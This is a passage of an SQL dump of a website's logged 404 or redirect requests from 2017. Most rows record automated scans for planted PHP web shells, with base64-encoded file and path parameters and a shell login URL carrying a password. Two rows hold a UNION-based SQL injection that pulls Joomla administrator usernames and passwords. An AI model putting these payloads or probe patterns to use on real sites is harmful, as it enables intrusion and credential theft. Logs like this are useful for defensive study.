00:00:00'),(10969,'http://hallcrestheights.org/sql_dump.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 04:32:51','0000-00-00 00:00:00'),(10970,'http://hallcrestheights.org/error-logs.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:35:14','0000-00-00 00:00:00'),(10971,'http://hallcrestheights.org/media/404.php?z3=R0tBNWpRLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:35:42','0000-00-00 00:00:00'),(10972,'http://hallcrestheights.org/media/tmp.php?z3=R0tBNWpRLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:36:13','0000-00-00 00:00:00'),(10973,'http://hallcrestheights.org/log.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:37:00','0000-00-00 00:00:00'),(10974,'http://hallcrestheights.org/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php',NULL,'http://hallcrestheights.org/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php','',1,0,'2017-07-04 04:37:21','0000-00-00 00:00:00'),(10975,'http://hallcrestheights.org/images/stories/0day.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:36:11','0000-00-00 00:00:00'),(10976,'http://hallcrestheights.org/includes/u2p.php?z3=R0tBNWpRLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:36:50','0000-00-00 00:00:00'),(10977,'http://hallcrestheights.org/images/xxx.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:37:17','0000-00-00 00:00:00'),(10978,'http://hallcrestheights.org/al277.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:37:52','0000-00-00 00:00:00'),(10979,'http://hallcrestheights.org/wp-admin/options-media.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:39:39','0000-00-00 00:00:00'),(10980,'http://hallcrestheights.org/wp-content/advanced-cache.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:40:12','0000-00-00 00:00:00'),(10981,'http://hallcrestheights.org/roubt.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:40:46','0000-00-00 00:00:00'),(10982,'http://hallcrestheights.org/images/al277.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:41:49','0000-00-00 00:00:00'),(10983,'http://hallcrestheights.org/webconfig.txt.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:42:13','0000-00-00 00:00:00'),(10984,'http://hallcrestheights.org/thumb.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:41:49','0000-00-00 00:00:00'),(10985,'http://hallcrestheights.org/configbak.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:44:38','0000-00-00 00:00:00'),(10986,'http://hallcrestheights.org/wp-main.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:45:04','0000-00-00 00:00:00'),(10987,'http://hallcrestheights.org/robot.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:45:38','0000-00-00 00:00:00'),(10988,'http://hallcrestheights.org/install.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:44:52','0000-00-00 00:00:00'),(10989,'http://hallcrestheights.org/images/1ndex.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:46:34','0000-00-00 00:00:00'),(10990,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=R0tBNWpRLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:47:09','0000-00-00 00:00:00'),(10991,'http://hallcrestheights.org/resd.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:47:42','0000-00-00 00:00:00'),(10992,'http://hallcrestheights.org/injctory.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:46:46','0000-00-00 00:00:00'),(10993,'http://hallcrestheights.org/mmytc.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:47:13','0000-00-00 00:00:00'),(10994,'http://hallcrestheights.org/images/laj.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:48:03','0000-00-00 00:00:00'),(10995,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=R0tBNWpRLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:49:49','0000-00-00 00:00:00'),(10996,'http://hallcrestheights.org/wsdl.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:48:54','0000-00-00 00:00:00'),(10997,'http://hallcrestheights.org/goog1es.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:50:37','0000-00-00 00:00:00'),(10998,'http://hallcrestheights.org/wp-admin/about.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWFkbWluLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:51:19','0000-00-00 00:00:00'),(10999,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=R0tBNWpRLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:51:41','0000-00-00 00:00:00'),(11000,'http://hallcrestheights.org/news.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:52:32','0000-00-00 00:00:00'),(11001,'http://hallcrestheights.org/SessionController.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:53:07','0000-00-00 00:00:00'),(11002,'http://hallcrestheights.org/maill.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:52:20','0000-00-00 00:00:00'),(11003,'http://hallcrestheights.org/error-log.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:54:27','0000-00-00 00:00:00'),(11004,'http://hallcrestheights.org/M-J!r4ya-F4r3s.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:53:38','0000-00-00 00:00:00'),(11005,'http://hallcrestheights.org/authenticating.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:54:04','0000-00-00 00:00:00'),(11006,'http://hallcrestheights.org/google-assist.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:55:47','0000-00-00 00:00:00'),(11007,'http://hallcrestheights.org/images/google-assist.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:56:15','0000-00-00 00:00:00'),(11008,'http://hallcrestheights.org/images/robots.txt.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:56:46','0000-00-00 00:00:00'),(11009,'http://hallcrestheights.org/yjh.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:57:11','0000-00-00 00:00:00'),(11010,'http://hallcrestheights.org/Ricsky.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:57:37','0000-00-00 00:00:00'),(11011,'http://hallcrestheights.org/elements.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:56:40','0000-00-00 00:00:00'),(11012,'http://hallcrestheights.org/xmlsrpc.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:58:29','0000-00-00 00:00:00'),(11013,'http://hallcrestheights.org/wp-cache.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:58:51','0000-00-00 00:00:00'),(11014,'http://hallcrestheights.org/images/head.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 04:59:43','0000-00-00 00:00:00'),(11015,'http://hallcrestheights.org/cache/support.php?z3=R0tBNWpRLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:00:05','0000-00-00 00:00:00'),(11016,'http://hallcrestheights.org/RoseLeif.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:00:30','0000-00-00 00:00:00'),(11017,'http://hallcrestheights.org/Abbrevsprl.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 05:00:53','0000-00-00 00:00:00'),(11018,'http://hallcrestheights.org/images/defau1t.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-04 05:04:57','0000-00-00 00:00:00'),(11019,'http://hallcrestheights.org/cli/40dd1d.php?z3=R0tBNWpRLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',1,0,'2017-07-04 05:05:39','0000-00-00 00:00:00'),(11020,'http://hallcrestheights.org/infos.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 05:10:41','0000-00-00 00:00:00'),(11021,'http://hallcrestheights.org/cache/defau1t.php?z3=R0tBNWpRLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:14:01','0000-00-00 00:00:00'),(11022,'http://hallcrestheights.org/A.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',3,0,'2017-07-04 05:14:30','0000-00-00 00:00:00'),(11023,'http://hallcrestheights.org/bookmark.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:13:36','0000-00-00 00:00:00'),(11024,'http://hallcrestheights.org/wp-data.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:15:48','0000-00-00 00:00:00'),(11025,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:16:19','0000-00-00 00:00:00'),(11026,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:16:53','0000-00-00 00:00:00'),(11027,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:17:22','0000-00-00 00:00:00'),(11028,'http://hallcrestheights.org/wp-content/plugins/wp-cache.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:16:31','0000-00-00 00:00:00'),(11029,'http://hallcrestheights.org/wp-content/plugins/wp-footers.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:18:12','0000-00-00 00:00:00'),(11030,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',4,0,'2017-07-04 05:18:37','0000-00-00 00:00:00'),(11031,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:17:44','0000-00-00 00:00:00'),(11032,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:19:34','0000-00-00 00:00:00'),(11033,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:20:01','0000-00-00 00:00:00'),(11034,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:19:38','0000-00-00 00:00:00'),(11035,'http://hallcrestheights.org/head.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 05:22:40','0000-00-00 00:00:00'),(11036,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:22:04','0000-00-00 00:00:00'),(11037,'http://hallcrestheights.org/wp-content/plugins/morepaddy.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:23:45','0000-00-00 00:00:00'),(11038,'http://hallcrestheights.org/cache/list.php?z3=R0tBNWpRLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:24:10','0000-00-00 00:00:00'),(11039,'http://hallcrestheights.org/images/interface.php?z3=R0tBNWpRLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:24:38','0000-00-00 00:00:00'),(11040,'http://hallcrestheights.org/sqldebug.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:25:12','0000-00-00 00:00:00'),(11041,'http://hallcrestheights.org/xmlrpc-activate.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:25:41','0000-00-00 00:00:00'),(11042,'http://hallcrestheights.org/keep.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:25:46','0000-00-00 00:00:00'),(11043,'http://hallcrestheights.org/tmpos.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:26:11','0000-00-00 00:00:00'),(11044,'http://hallcrestheights.org/link.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 05:26:38','0000-00-00 00:00:00'),(11045,'http://hallcrestheights.org/dcodzu.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:29:16','0000-00-00 00:00:00'),(11046,'http://hallcrestheights.org/codd.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:29:45','0000-00-00 00:00:00'),(11047,'http://hallcrestheights.org/cache/wcache7675n.PHP?z3=R0tBNWpRLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:28:55','0000-00-00 00:00:00'),(11048,'http://hallcrestheights.org/modules/mod_bookmark/helper.php?z3=R0tBNWpRLnBocA==&z4=L21vZHVsZXMvbW9kX2Jvb2ttYXJrLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:30:47','0000-00-00 00:00:00'),(11049,'http://hallcrestheights.org/content.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:31:14','0000-00-00 00:00:00'),(11050,'http://hallcrestheights.org/wp-content/plugins/sfn.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:30:20','0000-00-00 00:00:00'),(11051,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:32:07','0000-00-00 00:00:00'),(11052,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:32:38','0000-00-00 00:00:00'),(11053,'http://hallcrestheights.org/shootmei.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:31:50','0000-00-00 00:00:00'),(11054,'http://hallcrestheights.org/dcodqg.php?z3=R0tBNWpRLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 05:32:23','0000-00-00 00:00:00'),(11055,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/GKA5jQ.php',NULL,'','',1,0,'2017-07-04 05:34:16','0000-00-00 00:00:00'),(11056,'http://hallcrestheights.org/wp-content/plugins/revslider/temp/update_extract/GKA5jQ.php',NULL,'','',1,0,'2017-07-04 05:34:33','0000-00-00 00:00:00'),(11057,'http://hallcrestheights.org/wp-content/uploads/GKA5jQ.php',NULL,'','',1,0,'2017-07-04 05:34:51','0000-00-00 00:00:00'),(11058,'http://hallcrestheights.org/GKA5jQ.php',NULL,'','',1,0,'2017-07-04 05:35:04','0000-00-00 00:00:00'),(11059,'http://hallcrestheights.org/sites/all/libraries/elfinder/files/GKA5jQ.php',NULL,'','',1,0,'2017-07-04 05:35:19','0000-00-00 00:00:00'),(11060,'http://hallcrestheights.org/css/wp-settings.php?x=upload&mode=upload&upload=&ssp=RfVbHu&u=&action=upload&chdir=./&do=upload&pass=wcwc2016&login=go!&H=',NULL,'','',1,0,'2017-07-04 05:35:42','0000-00-00 00:00:00'),(11061,'http://hallcrestheights.org/wp-content/bk.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2017-07-04 06:07:50','0000-00-00 00:00:00'),(11062,'http://hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/a.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy9lYXN5cm90YXRvci1mb3Itd29yZHByZXNzLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 06:09:50','0000-00-00 00:00:00'),(11063,'http://hallcrestheights.org/modules/modules/modules.php?z3=R0tBNWpRLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 06:12:15','0000-00-00 00:00:00'),(11064,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2017-07-04 06:14:52','0000-00-00 00:00:00'),(11065,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2017-07-04 06:13:42','0000-00-00 00:00:00'),(11066,'http://hallcrestheights.org/wp-content/1ndex.php?z3=R0tBNWpRLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',2,0,'2017-07-04 06:15:13','0000-00-00 00:00:00'),(11067,'http://hallcrestheights.org/files/files.php?z3=R0tBNWpRLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-04 06:15:22','0000-00-00 00:00:00'),(11068,'http://hallcrestheights.org/files/conn.php?z3=R0tBNWpRLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',1,0,'2017-07-04 06:17:02','0000-00-00 00:00:00'),(11069,'http://hallcrestheights.org/libraries/joomla/1ndex.php?z3=R0tBNWpRLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2017-07-04 06:17:17','0000-00-00 00:00:00'),(11070,'http://www.hallcrestheights.org/k50120-gnfznxvj-xpalt-itjshkyj-i20162631-yldpija.htm',NULL,'','',2,0,'2017-07-04 18:28:07','0000-00-00 00:00:00'),(11071,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-k44528-eajanpdm-i20162637-efnxhqf-hjdyha-oxrcj.htm',NULL,'','',1,0,'2017-07-04 18:42:48','0000-00-00 00:00:00'),(11072,'http://www.hallcrestheights.org/gnfznxv-jxpaltit-k42528-jshkyjyl-dpijaam-durtae-npggw-i20162632-tdvlxtdq-kunf-glqrhz-yonx-feqn.htm',NULL,'https://search.yahoo.co.jp/','',3,0,'2017-07-06 11:45:16','0000-00-00 00:00:00'),(11073,'http://hallcrestheights.org/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=24+limit+0,1--+a',NULL,'','',1,0,'2017-07-06 20:45:03','0000-00-00 00:00:00'),(11074,'http://hallcrestheights.org/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=25+limit+0,1--+a',NULL,'','',1,0,'2017-07-06 20:45:49','0000-00-00 00:00:00'),(11075,'http://hallcrestheights.org//images/1ndex.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-07-07 19:32:31','0000-00-00 00:00:00'),(11076,'http://hallcrestheights.org//sqlbak.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-07 19:32:34','0000-00-00 00:00:00'),(11077,'http://hallcrestheights.org//email.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:02','0000-00-00 00:00:00'),(11078,'http://hallcrestheights.org//functions.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:31:47','0000-00-00 00:00:00'),(11079,'http://hallcrestheights.org//cache/news.php?z3=YWNGRDRmLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:12','0000-00-00 00:00:00'),(11080,'http://hallcrestheights.org//tmp.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',4,0,'2017-07-07 19:33:18','0000-00-00 00:00:00'),(11081,'http://hallcrestheights.org//shootme.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:21','0000-00-00 00:00:00'),(11082,'http://hallcrestheights.org//configurationbak.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:23','0000-00-00 00:00:00'),(11083,'http://hallcrestheights.org//robots.txt.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:28','0000-00-00 00:00:00'),(11084,'http://hallcrestheights.org//jconfig.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:31','0000-00-00 00:00:00'),(11085,'http://hallcrestheights.org//media/reads.php?z3=YWNGRDRmLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:36','0000-00-00 00:00:00'),(11086,'http://hallcrestheights.org//media/1ndex.php?z3=YWNGRDRmLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:40','0000-00-00 00:00:00'),(11087,'http://hallcrestheights.org//sql_dump.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-07 19:34:11','0000-00-00 00:00:00'),(11088,'http://hallcrestheights.org//images/laj.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:34:12','0000-00-00 00:00:00'),(11089,'http://hallcrestheights.org//media/404.php?z3=YWNGRDRmLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:34:20','0000-00-00 00:00:00'),(11090,'http://hallcrestheights.org//media/tmp.php?z3=YWNGRDRmLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:34:22','0000-00-00 00:00:00'),(11091,'http://hallcrestheights.org//r3x.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-07 19:34:27','0000-00-00 00:00:00'),(11092,'http://hallcrestheights.org//log.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:34:57','0000-00-00 00:00:00'),(11093,'http://hallcrestheights.org//images/stories/0day.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:01','0000-00-00 00:00:00'),(11094,'http://hallcrestheights.org//includes/u2p.php?z3=YWNGRDRmLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:04','0000-00-00 00:00:00'),(11095,'http://hallcrestheights.org//images/xxx.php?z3=YWNGRDRmLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:07','0000-00-00 00:00:00'),(11096,'http://hallcrestheights.org//al277.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:33:51','0000-00-00 00:00:00'),(11097,'http://hallcrestheights.org//cache/cache_aqbmkwwx.php?z3=YWNGRDRmLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:13','0000-00-00 00:00:00'),(11098,'http://hallcrestheights.org//install.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:17','0000-00-00 00:00:00'),(11099,'http://hallcrestheights.org//dswat.org/wsdl.php?z3=YWNGRDRmLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:21','0000-00-00 00:00:00'),(11100,'http://hallcrestheights.org//robot.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:23','0000-00-00 00:00:00'),(11101,'http://hallcrestheights.org//wsdl.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:28','0000-00-00 00:00:00'),(11102,'http://hallcrestheights.org//goog1es.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:31','0000-00-00 00:00:00'),(11103,'http://hallcrestheights.org//site/tmp/cTivrC.php?z3=YWNGRDRmLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:33','0000-00-00 00:00:00'),(11104,'http://hallcrestheights.org//update.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:36','0000-00-00 00:00:00'),(11105,'http://hallcrestheights.org//includes.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:39','0000-00-00 00:00:00'),(11106,'http://hallcrestheights.org//wp-main.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-07-07 19:35:43','0000-00-00 00:00:00'),(11107,'http://hallcrestheights.org//news.php?z3=YWNGRDRmLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-07-07 